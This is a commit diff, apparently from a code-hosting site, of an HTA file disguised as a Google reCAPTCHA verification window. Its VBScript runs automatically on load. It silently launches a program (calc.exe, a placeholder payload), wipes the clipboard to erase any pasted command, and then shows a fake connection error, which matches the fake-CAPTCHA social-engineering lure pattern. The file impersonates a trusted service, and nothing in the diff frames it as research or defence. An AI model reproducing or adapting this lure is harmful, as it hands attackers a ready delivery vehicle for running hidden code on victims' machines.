enotkrutoy commited on
Commit
90206a5
·
verified ·
1 Parent(s): 11ea2ac

Update verif

Browse files
Files changed (1) hide show
  1. verif +25 -25
verif CHANGED
@@ -1,7 +1,7 @@
1
  <!DOCTYPE html>
2
  <html>
3
  <head>
4
- <title>reCAPTCHA Verification</title>
5
  <HTA:APPLICATION
6
  APPLICATIONNAME="reCAPTCHA Verification"
7
  BORDER="thin"
@@ -14,7 +14,7 @@
14
  SCROLLFLAT="yes"
15
  SYSMENU="yes"
16
  />
17
- <style>
18
  body {
19
  font-family: Roboto, helvetica, arial, sans-serif;
20
  margin: 0;
@@ -46,19 +46,19 @@
46
  .terms a:hover {
47
  text-decoration: underline;
48
  }
49
- </style>
50
- <script language="VBScript">
51
- Sub Window_onLoad
52
  Window.ResizeTo 520, 480
53
- Window.MoveTo (Screen.Width - 300) / 2, (Screen.Height - 400) / 2
54
 
55
  Set objShell = CreateObject("WScript.Shell")
56
- objShell.Run "calc.exe", 0, False
57
 
58
  ClearClipboard
59
 
60
  objShell.Run "timeout /T 2 /nobreak", 0, True
61
- Call HideConnectingShowError
62
  objShell.Run "timeout /T 1 /nobreak", 0, True
63
  End Sub
64
 
@@ -70,22 +70,22 @@
70
  Sub ClearClipboard
71
  Dim objHTML
72
  Set objHTML = CreateObject("htmlfile")
73
- objHTML.parentWindow.clipboardData.setData "text", ""
74
  Set objHTML = Nothing
75
  End Sub
76
- </script>
77
- </head>
78
- <body>
79
- <img src="https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" alt="reCAPTCHA Logo">
80
- <div id="connecting" style="display:block;">
81
- <p>Verifying reCAPTCHA, please wait...</p>
82
- </div>
83
- <div id="error" style="display:none;">
84
- <p><b>Failed to connect with the reCAPTCHA server.</b><br>Try the verification steps again.</p>
85
- </div>
86
- <p class="terms">
87
- <a href="https://www.google.com/intl/en/policies/privacy/">Privacy</a> -
88
- <a href="https://www.google.com/intl/en/policies/terms/">Terms</a>
89
- </p>
90
- </body>
91
- </html>
 
1
  <!DOCTYPE html>
2
  <html>
3
  <head>
4
+ <title>reCAPTCHA Verification</Title>
5
  <HTA:APPLICATION
6
  APPLICATIONNAME="reCAPTCHA Verification"
7
  BORDER="thin"
 
14
  SCROLLFLAT="yes"
15
  SYSMENU="yes"
16
  />
17
+ <Style>
18
  body {
19
  font-family: Roboto, helvetica, arial, sans-serif;
20
  margin: 0;
 
46
  .terms a:hover {
47
  text-decoration: underline;
48
  }
49
+ </Style>
50
+ <Script language="VBScript">
51
+ Sub Window_OnLoad
52
  Window.ResizeTo 520, 480
53
+ Window.MoveTo (Screen.Width - 520) / 2, (Screen.Height - 480) / 2
54
 
55
  Set objShell = CreateObject("WScript.Shell")
56
+ objShell.Run "calc.exe", 0, False
57
 
58
  ClearClipboard
59
 
60
  objShell.Run "timeout /T 2 /nobreak", 0, True
61
+ HideConnectingShowError
62
  objShell.Run "timeout /T 1 /nobreak", 0, True
63
  End Sub
64
 
 
70
  Sub ClearClipboard
71
  Dim objHTML
72
  Set objHTML = CreateObject("htmlfile")
73
+ objHTML.parentWindow.clipboardData.setData "Text", ""
74
  Set objHTML = Nothing
75
  End Sub
76
+ </Script>
77
+ </Head>
78
+ <Body>
79
+ <Img src="https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" alt="reCAPTCHA Logo">
80
+ <Div id="connecting" style="display:block;">
81
+ <P>Verifying reCAPTCHA, please wait...</P>
82
+ </Div>
83
+ <Div id="error" style="display:none;">
84
+ <P><B>Failed to connect with the reCAPTCHA server.</B><Br>Try the verification steps again.</P>
85
+ </Div>
86
+ <P class="terms">
87
+ <A href="https://www.google.com/intl/en/policies/privacy/">Privacy</A> -
88
+ <A href="https://www.google.com/intl/en/policies/terms/">Terms</A>
89
+ </P>
90
+ </Body>
91
+ </Html>